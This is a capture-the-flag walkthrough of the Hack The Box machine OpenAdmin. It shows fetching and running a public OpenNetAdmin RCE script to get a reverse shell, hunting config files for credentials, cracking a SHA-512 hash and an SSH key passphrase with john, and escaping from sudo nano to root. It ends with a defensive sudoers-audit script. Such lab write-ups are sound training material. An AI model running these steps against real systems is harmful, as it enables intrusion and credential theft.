OpenAdmin | Config files, RSA decrypt, Sudo Nano

A number of virtual webpages are being served, which leads to confusion; however, once the "in" is discovered, the real fun begins!

by Johann Van Niekerk

OpenAdmin from HackTheBox

Introduction

OpenAdmin is classed as Easy in difficulty by Hack The Box; however, user reporting indicates that the difficulty curve is more aligned with the Medium mark. Overall it is a great challenge as part of TJNull's list of boxes for preparing for the OSCP. The box contains web enumeration but very minor web exploitation. The entry was simply a matter of finding the "in" and then discovering the web app's name and version. The bulk of the work was enumeration on the system and knowing where to look for credentials and information. The challenge was definitely in the discovery of information.

Enumeration

❯ sudo nmap -sV 10.10.10.171
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Exploitation

Through initial enumeration, nmap shows that both port 22 and port 80 are open. SSH is typically not a vulnerable service to exploit, leaving the latter port as the destination.

www-data

From poking around within the HTTP website, it appears to be a default Apache installation page.

Running feroxbuster returns several interesting directories, each entry representing its own website.

❯ feroxbuster -n -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.171/ -x html

The first target is /music/; while fumbling around, it appears that clicking Login automatically logs you in as guest.

The page immediately displays the version, and looking at the browser source shows the web app to be OpenNetAdmin.

Knowing both the application and the version, it is worth searching for already-known exploits. Google shows a possible Remote Code Execution vulnerability using the following exploit:

OpenNetAdmin RCE

In order to use the exploit, first set up the listener:

nc -lvnp 4444

Then running the exploit:

wget https://raw.githubusercontent.com/d4t4s3c/OpenNetAdmin18.1.1RCE/main/OpenNetAdmin.sh
chmod +x ./OpenNetAdmin.sh
./OpenNetAdmin.sh $url $lhost $lport

With this we receive the reverse shell and are able to interact directly with the web server as www-data. First we want to stabilise our shell so that accidental issues (a stray Ctrl+C, for example) do not cost us the session.

which python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
# Background the shell with Ctrl+Z, then on the local terminal:
stty raw -echo; fg
export TERM=xterm

While poking around with the following command, we find a database_settings file within /opt/ona/www/local/config that contains the first set of credentials:

# Quote the glob so the shell does not expand it before find runs
find . -name '*settings*.php' 2>/dev/null

With the found credentials, we can look for where to use them. First we look for usernames and then test the password against each one. The following searches /etc/passwd for users with a login shell such as /bin/bash:

grep 'sh$' /etc/passwd
root:x:0:0:root:/root:/bin/bash
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
joanna:x:1001:1001:,,,:/home/joanna:/bin/bash

Attempting the password with jimmy logs us in as him!

Jimmy

As we have Jimmy's credentials, recall that SSH was also open, so we can move from our netcat shell to an SSH login. Poking around some more does not uncover much, so looking at listening TCP/UDP ports is a good next move:

netstat -auntlp

With this we find that port 52846 is listening on the loopback interface only. We want to see what content is there, and we can use SSH local port forwarding to reach it:

# Port forward: local port 1081 -> 127.0.0.1:52846 on the target
ssh -L 1081:127.0.0.1:52846 jimmy@10.10.10.171

Now we can access the content on our local browser by visiting the following url:

After many attempts at brute forcing with common credentials, there wasn't much information to gather from this, which meant we were lacking credentials that were likely still within the web server.

We know that this webpage is hosted on the loopback address and that it clearly has an index page, so we need to find its code within the web server. There is another directory called Internal within the /var/www folder.

Looking into it, we discover from the index.php code that the content is very similar to what we are seeing on localhost, so this folder likely holds the internally hosted site. Further down, index.php also includes an interesting value that appears to be a SHA-512 hash. This is normally a difficult hash to brute force, as it can take a long time to crack, so before starting up John or hashcat it is a good idea to use online resources first. Crackstation uses very large rainbow tables of pre-computed hash-to-password matches, so it is often worth searching there before anything else.

The good news is that when using Crackstation rainbow tables, it was able to match the hash within seconds (password blurred):

Going back to the internal content, we enter the user Jimmy and his password and receive the following page.

This is an RSA private key used with SSH. We can copy it into a file and attempt to use it to log in. Copy the content from the opening dashes to the closing dashes and save it locally:

echo "content" > id_rsa

When attempting to log in as any of the remaining users, SSH asks for a passphrase. This means the private key is protected by a passphrase that we don't have. To get it, we can attempt to crack the passphrase. First we need to convert the key into a hash that John can work with:

# Convert the key into a hash
/usr/share/john/ssh2john id_rsa > crackme

Then use John or hashcat to crack it:

john crackme --wordlist=/usr/share/wordlists/rockyou.txt

After a few seconds, the passphrase was recovered! With this we can try to log in as any of the remaining users we know about.

Unfortunately it was not possible to log in as root, so Joanna is our next bet.

# SSH login with the private key; enter the recovered passphrase when prompted
ssh -i id_rsa joanna@10.10.10.171

This was a success!

Joanna

Having logged in as Joanna, we are able to get our first user flag.

Through general enumeration we find that Joanna can run a single command with sudo without a password prompt:

sudo -l

The permitted command opens /opt/priv in nano as root:

sudo /bin/nano /opt/priv

The first thing here is to check whether there is information on the program at https://gtfobins.github.io. Looking at GTFOBins shows how nano can be used for shell escapes:

And with that we are root and able to get the root flag.
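As a defender's check for this class of misconfiguration, here is an added example (not from the original write-up, Hack The Box or GTFOBins): a POSIX shell audit that flags NOPASSWD sudoers rules handing out ALL or a binary GTFOBins lists as shell-escapable, which is exactly the rule that gave root here. The ESCAPE_BINS list, the sample sudoers file and the function names are assumptions of this example.

```shell
#!/bin/sh
# Hypothetical sudoers audit written for this walkthrough (not an HTB or GTFOBins tool).
# Flags NOPASSWD rules that grant ALL or a binary GTFOBins documents as shell-escapable,
# the pattern that gave root on this box (joanna -> sudo /bin/nano /opt/priv).

# Basenames GTFOBins lists with a "Sudo" shell-escape entry (assumed; trim or extend).
ESCAPE_BINS="nano vim vi less more man awk perl python python3 find"

# find_risky_rules FILE
# Prints "<user><TAB><command>" for every passwordless command that is ALL or
# whose binary basename is in ESCAPE_BINS. Comment lines are skipped.
# On a real host: find_risky_rules /etc/sudoers, then each /etc/sudoers.d/* file.
find_risky_rules() {
    grep -v '^[[:space:]]*#' "$1" | grep 'NOPASSWD' |
    while IFS= read -r rule; do
        user=$(printf '%s\n' "$rule" | awk '{print $1}')
        cmds=${rule##*NOPASSWD:}    # text after the tag is the command list
        printf '%s\n' "$cmds" | tr ',' '\n' | while IFS= read -r cmd; do
            cmd=$(printf '%s\n' "$cmd" | sed 's/^[[:space:]]*//;s/[[:space:]]*$//')
            if [ -z "$cmd" ]; then continue; fi
            if [ "$cmd" = "ALL" ]; then
                printf '%s\t%s\n' "$user" "$cmd"
                continue
            fi
            bin=$(basename "${cmd%% *}")    # first word, directory stripped
            for e in $ESCAPE_BINS; do
                if [ "$bin" = "$e" ]; then printf '%s\t%s\n' "$user" "$cmd"; fi
            done
        done
    done
}

# write_sample_sudoers FILE
# Constructed sample in sudoers syntax; the joanna line mirrors the rule found on the box.
write_sample_sudoers() {
cat > "$1" <<'EOF'
# User privilege specification (constructed sample, not the box's real file)
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
joanna  ALL=(ALL) NOPASSWD: /bin/nano /opt/priv
backup  ALL=(root) NOPASSWD: /usr/bin/rsync, /usr/bin/less /var/log/syslog
ops     ALL=(ALL) NOPASSWD: ALL
deploy  ALL=(ALL) /usr/bin/systemctl restart app
EOF
}

# Demo run on the sample; point find_risky_rules at a real sudoers path to audit a host.
sample=$(mktemp)
write_sample_sudoers "$sample"
find_risky_rules "$sample"
rm -f "$sample"
```

Each flagged line is a rule worth replacing with a narrower wrapper script or a password-required entry; rsync and systemctl in the sample are left alone because they are not in the escape list.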

Root

Final Word

The box is one of TJNull's list of OSCP-like boxes, and it definitely lives up to that in terms of the information gathering required on the target. While the box is classed as Easy by Hack The Box, user reporting was that it was more of a Medium difficulty box. The exploits were great and not particularly difficult to discover; however, the information gathering was the key focus on this box.